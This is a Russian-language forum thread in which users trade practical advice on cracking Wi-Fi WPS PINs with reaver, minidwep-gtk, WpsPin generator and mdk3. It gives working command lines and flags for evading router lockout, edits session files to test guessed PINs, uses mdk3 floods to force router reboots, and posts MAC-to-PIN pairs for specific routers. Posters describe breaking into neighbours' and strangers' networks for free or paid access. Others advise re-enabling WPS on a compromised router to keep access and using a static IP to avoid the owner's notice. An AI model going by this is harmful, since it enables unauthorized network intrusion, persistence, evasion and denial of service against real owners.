интервала, если вы уверены что ваш PIN начинается, скажем, с 3000. А также для теста. (Значение 4 или 8 цифр). reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --pin 3000 (-g), --max-attempts и -w, --win7. Здесь думаю объяснять не нужно. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx –w –g 15 -r, --recurring-delay Интересная функция позволяет приостановить перебор на определенное время после определенного количества попыток и затем его продолжить, не создавая лишнего “подозрения” у АР. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx -r 8:20

vedemur
08.12.2012, 21:50
(-g), --max-attempts и -w, --win7. Здесь думаю объяснять не нужно. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx –w –g 15- почему объяснять не нужно, думаю, не все это знают, например я. Объясните п ж. Спасибо.

Dovbnyak
10.12.2012, 02:19
Привет всем Видел много тем что много кто не мог установить WPScrsck gui решил помочь ) для начала качаем саму сборку ) http://sourceforge.net/projects/wpscrackgui/files/Ubuntu/ если у вас сборка Gnome сам ею пользуюсь то откроем консоль и введем воттакое dpkg -i копируем имя файла которий скачали и вставляем в моем слусае ето wpscrackgui_1.1.8-1_ubuntu.deb будет примерно так dpkg -i wpscrackgui_1.1.8-1_ubuntu.deb жмем ентер и ждем окончания потом пишем apt -get -f install спросит y/n берем y и ждем настройки и все готово можно пользоваться програмой ) она находится в подменю Internet )

1. dpkg -i wpscrackgui_1.1.8-1_ubuntu.deb

2. apt -get -f install

И радуемся что унас все получилось )

Dovbnyak
10.12.2012, 02:26
И еще сам довольно часто ломаю в барселоне AP так сказать на етом подрабативаю иногда приходится довольно часто наблюдать перебор одного и тогоже пароля типа 12345670 и ступор хотя по логу видно что все ок нак шлет итд.... подставлял разние функц... ничего не помагает откатил на 1.3 вроде все пошло но после 10или дааже больше пинов идет warning receive timeout occurred . Но WPS не блочит я так понял что точка делает паузу пробовал делать таймаут на 10-30 сек после 4 пинов после 6 ничего не омогло продержалось немного и потом опять лепит warning receive timeout occurred приходится все запускать по новой и + не удобно имя AP ORANGE знаю что в етих роутерах уже стояла защита от брута даже раньше всех но старие коробочки иногда здаются после бомбардировок MDK3 можно ли както обойти ету редиску ?

Dovbnyak
10.12.2012, 02:30
(-g), --max-attempts и -w, --win7. Здесь думаю объяснять не нужно. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx –w –g 15- почему объяснять не нужно, думаю, не все это знают, например я. Объясните п ж. Спасибо.



Что тут не понятно -w значит что reaver будет посилать мимики ввода pin как у Windows7 тем самим скроет подозрения брута ! Ну а g 15 если мне не врет память то ето время после которого будет произведена проба следуищего пароля чтоб не лепило 3 парося в сек ставим 15 сек и оно будет вводить пароль каждие 15 сек Или наоборот ето команда -d задает ето время влюбом случае они похожи между собой )

vedemur
10.12.2012, 20:44
Всем привет,уважаемые форумчане. Не однократно читал, про откат reaver на версию 1.3 и это помогает. Я использую BT5R3 gnome загрузочный. Там можно откатить? Если да-то как? Заранее спасибо.

arkadiy0
10.12.2012, 20:48
Прошу помощи студии) Подобрал пин к точке а место пароля WPA2 вылезла вот такая хреновина http://s55.radikal.ru/i148/1212/0f/d738942e6fcd.png

Веду боевые действия с wifislax-4.3-rc6 как коректно увидеть пароль прямо в боевой машине(wifislax) (windows 7 не полюзуюсь)

Dovbnyak
11.12.2012, 00:00
Всем привет,уважаемые форумчане. Не однократно читал, про откат reaver на версию 1.3 и это помогает. Я использую BT5R3 gnome загрузочный. Там можно откатить? Если да-то как? Заранее спасибо.




Можно и оч просто Установи WPScrackgui там есть как обновление так и автомат... откат на версию 1.3 )

Dovbnyak
11.12.2012, 00:41
Прошу помощи студии) Подобрал пин к точке а место пароля WPA2 вылезла вот такая хреновина http://s55.radikal.ru/i148/1212/0f/d738942e6fcd.png

Веду боевые действия с wifislax-4.3-rc6 как коректно увидеть пароль прямо в боевой машине(wifislax) (windows 7 не полюзуюсь)




Подключайся по пину ))) Допустим у меня с моим адаптером идет програмное обеспичение там есть настройка с вводом WPS PIN И програма автоматичиски законектит к точке по пину если пин подойдет ) и потом можно посмотреть уже реал ключик в настройках сетевого подключения Windows ) REALTEK RTL8187 Wireless LAN Utility ето моя прога для моего адаптера ) А у тебя если нет то скачай из сайта производителя )

arkadiy0
11.12.2012, 18:12
Про прогу спасибо что подсказал))) но всеже в wifislax можно подобное сделать? или там какой модуль туда впихнуть?

Dovbnyak
12.12.2012, 03:11
Про прогу спасибо что подсказал))) но всеже в wifislax можно подобное сделать? или там какой модуль туда впихнуть?




Ну что тебе сказать я етой штукой только раз пользовался да и то года 2 назад помойму там тоже можна откатить но ето уже можеш задать такой вопрос автору одной из зборок wifislax wpa2 помойму ник тут есть пару его постов тамже и его сайт или в гугле набери wpa2.at./толи ua толи ru не помню но точно найдеш вот он тебе и ответит ) но всеже Backtrack 5 лутше больше софта и легченастроить )

vedemur
19.12.2012, 21:08
Всем доброго вечера. Как-то мне не везёт взламывать точки WPA. Я уже писал выше и вот опять проблема со взломом новой точки. Идёт взлом и через несколько секунд пишет 91,05% и идёт дальше. На пине 12349982 крутится без конца, дальше не продвигается. Пробовал три раза-результат тот-же. Но самый главный вопрос в том, что всегда после М6 пишет WARNING: Receive timeout occurred, не было ни одногт М7. Подскажите что бы это значило. Ламал и с помощью Aireplay тоже. Заранее спасибо.

Dovbnyak
21.12.2012, 06:45
Всем доброго вечера. Как-то мне не везёт взламывать точки WPA. Я уже писал выше и вот опять проблема со взломом новой точки. Идёт взлом и через несколько секунд пишет 91,05% и идёт дальше. На пине 12349982 крутится без конца, дальше не продвигается. Пробовал три раза-результат тот-же. Но самый главный вопрос в том, что всегда после М6 пишет WARNING: Receive timeout occurred, не было ни одногт М7. Подскажите что бы это значило. Ламал и с помощью Aireplay тоже. Заранее спасибо.




Похоже на блок или чтото того что AP заметила перебор то что сразу начинает с 91.5 ето значит что первая половина пина уже есть а ето ваще круть пробуй откатить Reaver на версию 1.3 помогает иногда или пробу ставить задержку между следующим вводом пароля на 20-30 сек параметр d20 число можно уменшить а можно и увеличить все зависит от того ак будет ити перебор ) или можно дать таймаут брута допустим после 10 вводов пароля ривер остановит брут на то время которое задаш ) параметр r 10:30 - 10 ето число ввода пароля после которого оно остановит соидинение а 30 ето 30 сек сна так сказать ! можно попробовать ище параметр

-w мимики windows 7 или -a автоматически виберет все настройки для AP Удачи пробуй !

vedemur
21.12.2012, 19:54
Dovbnyak, спасибо большое, попробовал всё указанное и никакого результата. А вот откатить reaver не получается, скатал WPScrackgui, а куда его загнать, чтоб установить и потом откатить-не знаю. Пользуюсь загрузочным BT R5 с флешки, а WPScrackgui находится на диске D. Подскажите как решить эту проблему. Завчасно дякую.

ivans39
22.12.2012, 14:19
http://youtu.be/fMjnoz4sfB8 Wifislax 4.3 rc9 WpsPin generator.попробавал и удалось моментально и правильно сгенерировать пин к роутеру BELKIN и получить wpa2 пароль.http://www.wifislax.com/

cassper666
22.12.2012, 16:07
WpsPin generator.попробавал и удалось моментально и правильно сгенерировать пин к роутеру



Чудесно. А есть отдельная ссылочка на пакет для BT5, а то муторно качать весь дистрибутив из-за одного генератора

vedemur
22.12.2012, 19:45
Отлично,WpsPin generator пин подбирает очень быстро, но при блокировке по МАС пароль не выдаёт. Жаль.

grant22
23.12.2012, 16:04
ломаю точку с впс через ривер. на точке блок 5 минут после пяти неудачных попыток. посмотрев лог я понал что он перебирает 0,05% в 5 минут подсчитав время у меня вышла примерно одна неделя!!!!!! никак это дело не ускорить? блок не обойти?

pav087
24.12.2012, 11:39
Вчера попробовал WpsPin generator (wifislax 4.3 final) на 2-х ломаных точках, почему-то ни к одной правильный пин не подобрал...

=RBK=
24.12.2012, 12:37
Вчера попробовал WpsPin generator (wifislax 4.3 final) на 2-х ломаных точках, почему-то ни к одной правильный пин не подобрал...


А попробуй кляксу, по-моему отлично настроена утилитка.

pav087
24.12.2012, 14:30
А попробуй кляксу, по-моему отлично настроена утилитка.



Спасибо! Попробую. Клякса это которая minidwep..?

vedemur
24.12.2012, 14:44
А как полное название этой кляксы, что это?

user100
24.12.2012, 15:13
Спасибо! Попробую. Клякса это которая minidwep..?






А как полное название этой кляксы, что это?



Вот же Клякса

vedemur
24.12.2012, 19:05
Вот же Клякса



Ничего не понял. Скачал по ссылке кляксу (200 кб), запустил BT R5 с флешки, скопировал скачанную кляксу на рабочий сто, запустил в терминале команду dpkg -i '/root/Desktop/minidwep-gtk-30513-bt5-32bit.deb' и ничего не увидел, никакой кляксы. Что я не правильно делаю?

user100
24.12.2012, 19:24
Ничего не понял. Скачал по ссылке кляксу (200 кб), запустил BT R5 с флешки, скопировал скачанную кляксу на рабочий сто, запустил в терминале команду dpkg -i '/root/Desktop/minidwep-gtk-30513-bt5-32bit.deb' и ничего не увидел, никакой кляксы. Что я не правильно делаю?



Все правильно делаете - вы ее этой командой установили и теперь она должна быть тут:

http://s2.uploads.ru/t/XO3cB.png

Либо через консоль ее запускайте командой: minidwep-gtk

vedemur
24.12.2012, 20:26
user100, спасибо, после повторной установки в терминале запустил команду minidwep-gtk и открылась клякса. Запустил Scan, прошла зелёная полоска и в терминале BT без конца и края пошло no action time out (здесь точки нет). Но когда остановил этот процесс в терсминале командой Ctr+C, нажал в кляксе Exit-она зависла и не отвечала. Что-то не так?

user100
24.12.2012, 21:12
user100, спасибо, после повторной установки в терминале запустил команду minidwep-gtk и открылась клякса. Запустил Scan, прошла зелёная полоска и в терминале BT без конца и края пошло no action time out (здесь точки нет). Но когда остановил этот процесс в терсминале командой Ctr+C, нажал в кляксе Exit-она зависла и не отвечала. Что-то не так?



Такой глюк возможен, когда меняешь МАС - адрес беспроводного адаптера. После сканирования должен выдаваться список сетей.

Как то так:

https://lh3.ggpht.com/-Yd_Wesutmw4/T7F_uVcYKsI/AAAAAAAAAh8/PqA-71hcN98/s640/minidwep+dictionary+attack.jpg

penixx
24.12.2012, 23:13
user100

где расположение, где в этом minidwep-gtk файлы сессии перебора сохраняет.

смотрю запускается заново с места где был остановлен, но всё равно хотелось бы вытащить этот фал как в reaver ....... .wpc

user100
24.12.2012, 23:19
user100

где расположение, где в этом minidwep-gtk файлы сессии перебора сохраняет.

смотрю запускается заново с места где был остановлен, но всё равно хотелось бы вытащить этот фал как в reaver ....... .wpc



Ищите тут:

PHP:



root@bt:/tmp/minidwep#

grant22
24.12.2012, 23:58
как восстановить сессию? прюоследний пин был 18825674 потом вырубили свет.

vedemur
25.12.2012, 00:09
user100 , сейчас запущена клякса и в верхней части есть точки, в нижней- пишет 12:04:44 Trying pin, а в окне терминала движутся надписи: task 14, потом time out и через несколько такиз записей пишет timer1 is out. В окне кляксы идёт взлом (пины). Почему так? И ещё, после каждой перезагрузки приходится по новой устанавливать кляксу. Это нормально, или что-то не то? Заранее спасибо.

user100
25.12.2012, 00:12
как восстановить сессию? прюоследний пин был 18825674 потом вырубили свет.



Сессия в reaver должна сохраняться автоматом после каждых 10 пин. Просто возобновите перебор. Так же можно использовать ключ -p 1882 .

grant22
25.12.2012, 00:17
Сессия в reaver должна сохраняться автоматом после каждых 10 пин. Просто возобновите перебор. Так же можно использовать ключ -p 1882 .



если я пишу -п 1882 он считает что это правильная половина ключя и перебирает следующие 3 или надо подождать?

user100
25.12.2012, 00:29
user100 , сейчас запущена клякса и в верхней части есть точки, в нижней- пишет 12:04:44 Trying pin, а в окне терминала движутся надписи: task 14, потом time out и через несколько такиз записей пишет timer1 is out. В окне кляксы идёт взлом (пины). Почему так? И ещё, после каждой перезагрузки приходится по новой устанавливать кляксу. Это нормально, или что-то не то? Заранее спасибо.



Нормальный подбор PIN должен идти так:

http://s2.uploads.ru/t/gcKfi.jpg

Остальное - смотрите в ошибках reaver'a выбрав ключ подробного вывода инфы -vv

Клякса ставиться один раз, если приходиться переустанавливать каждый раз , это косяки live usb

vedemur
25.12.2012, 00:45
да, вот так идёт, плюс терминал с бегущими надписями task 14, потом time out и timer1 is out. А насчёт косяки live usb-я с ISO записа на флешку. Может в этом проблема?

vedemur
25.12.2012, 13:43
Вчера попробовал WpsPin generator (wifislax 4.3 final) на 2-х ломаных точках, почему-то ни к одной правильный пин не подобрал...


То же самое.

user_bad
25.12.2012, 16:48
То же самое.



так процесс вероятностный, у меня пин генератор с ходу 2 точки открыл, не известные до того, а на известных не прверял, правда еще 3 ничего не показали но факт интересен, такое видел только на точке ASUS до того у которой пин был 12345670 так интересно что сразу все вышло. WIFISLAX-reaver тоже интересен в версии 4.3

grant22
28.12.2012, 00:01
ломаю модем Томсон 08:76:FF:XX:XX:XX ни в каких пин базах его нет? в wificrackgui может кто голянеть пожалуйста

Klaatu
28.12.2012, 08:22
ломаю модем Томсон 08:76:FF:XX:XX:XX ни в каких пин базах его нет? в wificrackgui может кто голянеть пожалуйста



79412988

grant22
28.12.2012, 13:08
79412988



ух ты а как где ты эго нашел? это значит мне -p 7941. прописывать?

Klaatu
28.12.2012, 14:45
ух ты а как где ты эго нашел? это значит мне -p 7941. прописывать?



Можешь попробовать в лоб прописать --pin=79412988 Но вряд ли пин именно такой, а вот первая половина может и совпасть.

В /usr/local/etc/reaver лежат сэйвы ривера для кажой точки. Надо найти нужный, открыть его в редакторе, и вписать вместо самой верхней цифры 7935. Потом запустить ривер, подождать, пока он переберет десяток пинов, и посмотреть, перескочит ли процентовка резко на 90%. Если перескочит, то это будет означать, что первая часть пина правильная, и ривер начнет подбирать вторую половину. Если не перескочит - увы, данный пин тебе не подходит.

eygen
29.12.2012, 03:00
Как сражаться с 90:F6:52:... -TL-WR841ND (Firmware Version: 3.13.9 build 120201 rel.54965n ,Hardware version: WR841N v6/v7). reaver -i mon0 -b [bssid] -c [channel] -e [essid] -w -r 8:315 -vv -не помогает,только 10 попыток и loced yes до перезагрузки роутера.Или как просмотреть эту проошивку,может надо ему давать подумать,например после 3-х попыток или время задержки другое ?

user100
30.12.2012, 20:56
Как сражаться с 90:F6:52:... -TL-WR841ND



Пробил по маку, попробуй с этими пинами:

http://images.vfl.ru/ii/1356882812/cc32394c/1484113_s.png

Увеличить

grant22
31.12.2012, 12:51
у меня блок на модеме на 5 мин и я уже своим ходом дошел до 7000. но мне кажется что что-то не так. как проверить что модем отвечает и ривер в пустую не работает?

sasha030612
31.12.2012, 16:08
Пробил по маку, попробуй с этими пинами:

http://images.vfl.ru/ii/1356882812/cc32394c/1484113_s.png

Увеличить



А где можно пробить пины по mac C8:64:C7

grant22
31.12.2012, 16:29
это порога для андроида. качай с сайта он на скрине виден. но в ней нет твоего мака

mr.anonimus
14.01.2013, 17:09
предлагаю в теме писать роутеры (название модель) у которых проходит данный тип атаки , я потом добавлю на главную страницу для упрощения поиска




В продолжение

"alexey1503" вот два:

essid: ASUS

bssid: 90:E6:BA:A2:E5:0A

pin: 17035419

essid: Home

bssid: 40:4A:03:77:43:3B

pin: 78159952

Выложил "Makak":

MAC : 00:26:E8:7A:63:xx

WPS PIN: 15483607

MAC : 84:C9:B2:53:6C:xx

WPS PIN: 54772373

MAC : 00:21:91:F6:35:xx

WPS PIN: 82744458

MAC : CC:5D:4E:51:00:xx

WPS PIN: 53084682

Выложил "user_bad"

zyxel

CC:5D:4E:4E:AE:AB

51565220

И кое что из собственного:

AP SSID: ZYXEL_KEENETIC

AP MAC: CC:5D:4E:2C:15:00

WPS PIN: 28889601

dir300-2

AP MAC: F0:7D:68:A1:17:C4

WPS PIN: 26016573

Еще попались 12345670 и 88264257 - вспомню маки и название роутеров, обязательно отпишусь!

trup_slona
17.01.2013, 19:35
У меня труба с андроидом определяет, что используется протокол WPS, можно даже пин вводить. А как на компе можно увидеть что точка использует WPS?

user100
17.01.2013, 21:10
У меня труба с андроидом определяет, что используется протокол WPS, можно даже пин вводить. А как на компе можно увидеть что точка использует WPS?



Под линух программка wash (wash -i mon0) определяет WPS. Прога входит в состав reaver-wps.

user_bad
20.01.2013, 14:33
e0:cb:4e:48:be:4b

pin 1244046

FC:75:16:CF:9E:4C

pin 46264848

14:A9:E3:00:67:CE

pin 00265744

F0:7D:68:755:3A

pin 03617984

00:26:18:C6:38:44

pin 12345670

14:A9:E3:00:70:C8

pin 00288729

это находилось реавером тогда не было впс генератора, а те что нашлись впс генераторм не выкладываю

Klaatu
23.01.2013, 20:28
Может кто подскажет пин от мака 3C:19:7D:



Нет такого в базе, увы...

Kinkara
26.01.2013, 00:28
Как заставить TP-LINK TL-WN7200ND работать с reaver в BT5R3 с флешки,хендешники ловит на ура,а вот reaver глухо(скорее всего обсуждали не раз,но к сожалению не нашёл)

fgh_2007
26.01.2013, 18:16
Как заставить TP-LINK TL-WN7200ND работать с riaver в BT5R3 с флешки,хендешники ловит на ура,а вот riaver глухо(скорее всего обсуждали не раз,но к сожалению не нашёл)



reaver

Po4ti nub
26.01.2013, 18:38
Пользуюсь программой AirSlax т.к в линуксе ни в зуб ногой и к тому же BT не хочет грузиться. Так вот при попытке взлома впс подбирает один и тот же пароль 12345670 несколько раз и выбивает ошибку. на этом все заканчивается. при повторной попытке то же самое. подскажите в чем проблема? и чуть не по теме: не могу отключать клиента. скоко раз пробовал ни разу хэндщэйка не поймал.

Stranger@
26.01.2013, 22:16
не могу отключать клиента. сколько раз пробовал ни разу хэндщэйка не поймал.



Вначале тоже не мог поймать хендшейк от одной точки(уровень сигнала был -85), пока не увеличил уровень сигнала до -75, тогда сразу поймал и ещё, от телефона с WI-FI хендшейк только почти вплотную можно поймать.

Po4ti nub
27.01.2013, 12:49
попробовал проверить cap файлы других пользователей в другой ветке на наличие ключа. так вот Aircrack выдает мне что в этих файлах нет хэндшейков. а другие пользователи находят ключи в этих cap файлах. получается что у меня нерабочая версия Aircrack? или причина в чем то другом? если можно дайте ссылку на последнюю версию Aircrack

paulo
28.01.2013, 15:08
не знаю куда написать отпишусь здесь:

WIFISLAX 4.4x

ASUS RT-N12C1

MAC 50:46:5D:62:1C:4C

WPS PIN: 51504472

На взлом точки ушло 7 дней, потому что был лимит (AP Rating limit)

в итоге 7 дней мозгопарки ривера и 365 дней интернета.

Всем удачи

kukushkindt
29.01.2013, 21:56
Люди добрые, поможите начинающему, кто чем может...

Первый роутер сдался без боя. Спасибо reaver'у. Со вторым вышла загвоздка. Reaver выдал pin и ключ. Вбиваю ключ в wicd, пытаюсь приконнектиться - не даёт. Скармливаю reaver'у тот же pin ещё раз и он выдаёт новый ключ, который тоже не даёт коннекта. Сколько бы раз я не вводил pin, ключи всегда разные и всегда неработающие. Во всех случаях ключ представляет собой комбинацию из 64 символов (0-9, a-f). Как это понимать и как с этим бороться?

user100
29.01.2013, 22:03
Люди добрые, поможите начинающему, кто чем может...

Первый роутер сдался без боя. Спасибо reaver'у. Со вторым вышла загвоздка. Reaver выдал pin и ключ. Вбиваю ключ в wicd, пытаюсь приконнектиться - не даёт. Скармливаю reaver'у тот же pin ещё раз и он выдаёт новый ключ, который тоже не даёт коннекта. Сколько бы раз я не вводил pin, ключи всегда разные и всегда неработающие. Во всех случаях ключ представляет собой комбинацию из 64 символов (0-9, a-f). Как это понимать и как с этим бороться?



Подключайтесь по пину. О том как это сделать в ВТ 5 было написано тут.

Hayes
04.02.2013, 16:42
А существует ли скрипт , который после получения 10 ошибок WPS менял бы мак на интерфейсе и перезапускал Reaver с новым маком?

mejuliet
09.02.2013, 19:40
Добрый день!

такая пробема. Вчера на ночь поставила Backtrack. быстро начал и сегодня сутра дошел до 45%. Но потом началась проблема, на одном пине завис и начал писать постоянно

[+] Trying pin 50679678

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[+] Sending EAPOL START request

я его остановила, прогнала просмотр доступных сетей опять - все видит, сигнал под 90-100, запусила reaver опять с места сохранения, добавила и -d 3 и --nack и --dh-small, но он все равно выдает ошибку

В итоге, перезагрузила все и попыталась начать заново, теперь с самого первого пина 12345670 пишет ошибку

для проверки еще зайшла под виндой (седьмая) и попыталась просто подлючиться к сети, а итоге выдало что "ОС не может подключиться к сети".

Подскажите пожалуйста что делать?

з.ы. ноут Lenovo IdeaPad S12, под WiFi вчера работала, все подключалась. До этого сетки ломал под BackTrack 5 и все было хорошо

mejuliet
09.02.2013, 23:34
жди пока точку перезагрузят или в принудительном порядке заставь перезагрузить. mdk3 в помощь для принудительной перезагрузки



аможно поподробнее про mdk3? я погуглила, нашла mdk3 mon0 a -a XX:XX:XX:XX:XX:XX

запустила а оно начало писать

Device is still responding with 500 clients connected!

AP xx:xx:09:39:E3:87 seems to be INVULNERABLE

и так далее..

что не так?

blackbone
14.02.2013, 00:59
Ривером подобрал пин код к сети. Но на ней динамичный пароль, меняется всё время. При помощи тплинк вайрлес ютилити подключился по пинкоду и зашёл на 192.168.1.1. логином и паролем были админ админ. Зашёл в вайрлесс секьюрити и скопировал пароль. Подключение к сети происходит, но без доступа к интернету. Почему нет доступа к интернету?

H3L1X
14.02.2013, 01:38
Ривером подобрал пин код к сети. Но на ней динамичный пароль, меняется всё время. При помощи тплинк вайрлес ютилити подключился по пинкоду и зашёл на 192.168.1.1. логином и паролем были админ админ. Зашёл в вайрлесс секьюрити и скопировал пароль. Подключение к сети происходит, но без доступа к интернету. Почему нет доступа к интернету?



Проверь, проходят ли пинги какого-нибудь ресурса. Хотя бы с уровнем определиться. Мб с dhcp что-то не так, посмотри в настройках роутера, включен ли вообще dhcp сервер.

blackbone
14.02.2013, 12:49
Проверь, проходят ли пинги какого-нибудь ресурса. Хотя бы с уровнем определиться. Мб с dhcp что-то не так, посмотри в настройках роутера, включен ли вообще dhcp сервер.



DHCP включен это точно. Сегодня посмотрю все его настройки. Можете подробнее описать как проверить приходят ли пинги ресурсов и как определиться с уровнем?

kosmaty
14.02.2013, 21:03
Там в меню роутера должен быть пункт, что-то на подобие "Диагностика". Когда его нажать, то сразу идет диагностика канала и результаты выдает в табличке. Там же есть и пинг произвольного адреса в миру. Если пинг пройдет, то роутер с инетом, его надо только взять, ну а если нет - то все телодвижения вообще бесполезны. Можно вайршарком, понюхеть, что там за айпишки в сети летают, даже если DHCP включен, все равно лучше себе статический IP присвоить - меньше палева, на роутерах есть статистика работы DHCP и там будет четко видно, что пользователей больше, чем положено. Ну и конечно вручную вбить в винде IP шлюза (самого роутера), без него инета точно не будет.

Po4ti nub
17.02.2013, 02:50
Всем привет. Взломал вайфай соседа (ну как взломал - помогли в соседней ветке). Все отлично, инет летает. И решил зайти поковыряться в настройках роутера... Когда начал пробовать думал не получится - оказалось логин остался стандартный админ. Говорю сразу-пробую это в первый раз. И в настройках роутера пункт впс выключен. Есть возможность его включить. Стоит ли это делать чтобы потом обезопасить себя когда хозяин сменит пароль? Или при смене пароля впс выключается автоматом после резета? И можно ли вообще включить впс программно не нажимая механической кнопки на роутере?

З.Ы. Простите за столь нубские вопросы..

H3L1X
17.02.2013, 17:29
Всем привет. Взломал вайфай соседа (ну как взломал - помогли в соседней ветке). Все отлично, инет летает. И решил зайти поковыряться в настройках роутера... Когда начал пробовать думал не получится - оказалось логин остался стандартный админ. Говорю сразу-пробую это в первый раз. И в настройках роутера пункт впс выключен. Есть возможность его включить. Стоит ли это делать чтобы потом обезопасить себя когда хозяин сменит пароль? Или при смене пароля впс выключается автоматом после резета? И можно ли вообще включить впс программно не нажимая механической кнопки на роутере?

З.Ы. Простите за столь нубские вопросы..



Удалённо впс не включается, если было выключено в панели администрирования роутера. То бишь, включить его можно только через ту же самю панель. Либо нажав кнопку.

WPS не выключается при смене пароля. Другой вопрос в том, что, когда хозяин роутера будет менять пароль, его может смутить включеный WPS, и он его ручками вырубит. Хотя, если пасс и логин к админке роутера остались стандартными, то, скорее всего, он этого не сделает. В общем, включи, и надейся, что хозяин роутера не подозревает, что такое WPS и что с его помощью можно сотворить =)

morla
23.02.2013, 03:16
взлом wifi: http://www.levinkv.ru/category/wi-fi

Buran
23.02.2013, 11:19
взлом wifi: http://www.levinkv.ru/category/wi-fi



http://s019.radikal.ru/i605/1302/d7/ce1362e72ff5.jpg

Не хорошо, однако...

user100
23.02.2013, 11:43
взлом wifi: http://www.levinkv.ru/category/wi-fi



Данеее, норм:

http://3.firepic.org/3/images/2013-02/23/7qrn3ra62puj.png

FallkeN
23.02.2013, 22:54
это находилось реавером тогда не было впс генератора, а те что нашлись впс генераторм не выкладываю



можно поподробнее, что за генератор?

Semapi
01.03.2013, 14:55
Генератор WPSPin на некоторые точки выдает pin вроде такого 1452XXXX. Подскажите, как подбирать pin, если известны только первых четыре символа? Если в reaver вписываю -p 14520000, то он только этот pin и проверяет, не продолжает диапазон.



-p 1452

Klaatu
01.03.2013, 17:09
-p 1452



Если так написать, то reaver будет перебирать все варианты пина 1452XXXX. Но как предлагается понять, правильная первая часть пина (которая 1452) или нет?

Лично я в таких случая редактирую save-файл reaver`а, чтобы он начал перебирать пины, несколько меньшие, чем искомый 1452. Например, стартуешь с 1447, немного ждешь, пока он переберет до 1452, а вот уже на этом искомом пине вариантов два. Т.е. либо он дальше начнет перебирать 1453, 1454 итд, либо же первая часть окажется верная, и тогда reaver продолжит перебор второй части пина, а первая часть перестанет изменяться. Также счетчик процентов reaver резко перезкочит на 90%, что и означает успешный подбор первой части пина....

Klaatu
01.03.2013, 21:42
Не известно, может правильная, может и нет. Выдано генератором WPSPin по шести символам mac-роутера.

Если способ с редактированием save-файл reaver`а может помочь в этом случае, подскажите как все это сделать?



Открываешь save-файл и меняешь первую строчку в нем на искомый пин, который нужно проверить -10, т.е. в твоем случае на 1442. Вторая и третья строчка файла - должны быть нули. Запускаешь reaver, на вопрос продолжить - отвечаешь yes, перебор должен пойти с 1442 или около того. Ну и ждешь, пока дойдет до искомого 1452. Если пойдет перебирать дальше 1453 1454 итд - значит не он.

PS Забыл написать где искать save-файлы. В bt они в /usr/local/etc/reaver Названия файлов строятся по mac-адресам точек. Тебе нужно выбрать нужный и отредактировать только его.

cardons
02.03.2013, 01:45
Понимаю что данные вопросы уже были но повторюсь.

Подбираю одну точку. Уже раз 10-й идет на 99.9% что делать?

И где можно взять базу пинов по макам?

Klaatu
02.03.2013, 16:23
И где можно взять базу пинов по макам?



База есть в последней версии wpscrackgui. Либо под андроид есть программа wpspin. Однако проку от этой базы обычно мало.

beowulf0208
02.03.2013, 22:20
Вчера взломал пароль к Wi-Fi роутеру с включенным WPS, причём это получилось сделать за 3-5 минут. Сначала получил pin, а потом и сам пароль к Wi-Fi. Сейчас задумался, если вдруг пароль к Wi-Fi сменять, то pin как я понимаю останется неизменным. Можно ли зная pin получить пароль к Wi-Fi, т.е. допустим я отправляю роутеру pin, а он мне в ответ присылает пароль к Wi-Fi?

user100
03.03.2013, 16:47
Вчера взломал пароль к Wi-Fi роутеру с включенным WPS, причём это получилось сделать за 3-5 минут. Сначала получил pin, а потом и сам пароль к Wi-Fi. Сейчас задумался, если вдруг пароль к Wi-Fi сменять, то pin как я понимаю останется неизменным. Можно ли зная pin получить пароль к Wi-Fi, т.е. допустим я отправляю роутеру pin, а он мне в ответ присылает пароль к Wi-Fi?



Именно так, все верно понимаете.

arachne
03.03.2013, 18:38
Доброго времени

Подскажите, пожалуйста, есть ли возможность запустить reaver на брут пинов в обратном порядке?

Дело в том, что у меня пробрутились 50% пинов и пришлось остановить брут, а сессию сохранить было нельзя. Теперь хотелось бы начать с середины или, что лучше, с конца.

Спасибо.

зы. Похоже, понял. -p 5000 да?

user100, спасибо.

user100
03.03.2013, 20:02
Доброго времени

Подскажите, пожалуйста, есть ли возможность запустить reaver на брут пинов в обратном порядке?

Дело в том, что у меня пробрутились 50% пинов и пришлось остановить брут, а сессию сохранить было нельзя. Теперь хотелось бы начать с середины или, что лучше, с конца.

Спасибо.

зы. Похоже, понял. -p 5000 да?



читай пост #456

d1nk3r
06.03.2013, 15:19
Подскажите плиз, как в кляксе скинуть сессию ривера, т.е. чтобы начался перебор с самого начала?

penixx
06.03.2013, 15:23
Подскажите плиз, как в кляксе скинуть сессию ривера, т.е. чтобы начался перебор с самого начала?



удалить файл перебора для этой точки.

ищи его в темр/клякса

d1nk3r
06.03.2013, 15:35
удалить файл перебора для этой точки.

ищи его в темр/клякса



Спасибо.

Ещё один вопрос: как только начал пользоваться ривером, случайно ввёл -p 1234, даже не зная для чего оно нужно, на одной точке после ~10 переборов скакнуло на 90%.

Сейчас уже 98% но пакеты M5,M6 не идут.

Я правильно понял, что это просто глюк ривера и нужно начинать перебор без -p?

penixx
06.03.2013, 15:51
если сразу скакануло, то да - заново

ecли поперебирал 0,05-0,1-0,15 - то мож быть и правильно

начинай конечно без -p не придумывай лишнего,

тем более 1234 в самом начале и если правильно снова прыганёт на 90,90

Dovbnyak
07.03.2013, 20:05
аможно поподробнее про mdk3? я погуглила, нашла mdk3 mon0 a -a XX:XX:XX:XX:XX:XX

запустила а оно начало писать

Device is still responding with 500 clients connected!<br/>
AP xx:xx:09:39:E3:87 seems to be INVULNERABLE

и так далее..

что не так?




MDK3 можно назвать малениким но оч сильн... инструментом для DDos Wi-Fi Если ето можно так обяснить Использую MDK3 не перв день для убийства роутера ))) Тоисть для его перезагрузки егоже владельцем )

Обясню фкнкции

Ключ b засирает ефир фальш точками AP Тоисть в ефире появляется множество точек доступа с китайскими иероглифами или даже можно создать блокнот и в блокнот вписать имена для будущих точек и имена будет брать с блокнота )

будет примерно так MDK3 mon0 (Wlan0) a -t BSSID

Ключ p Ето брут имени AP Тоисть есть скритая точка доступа можно брутить имя по базе слов одним словом брут ESSID

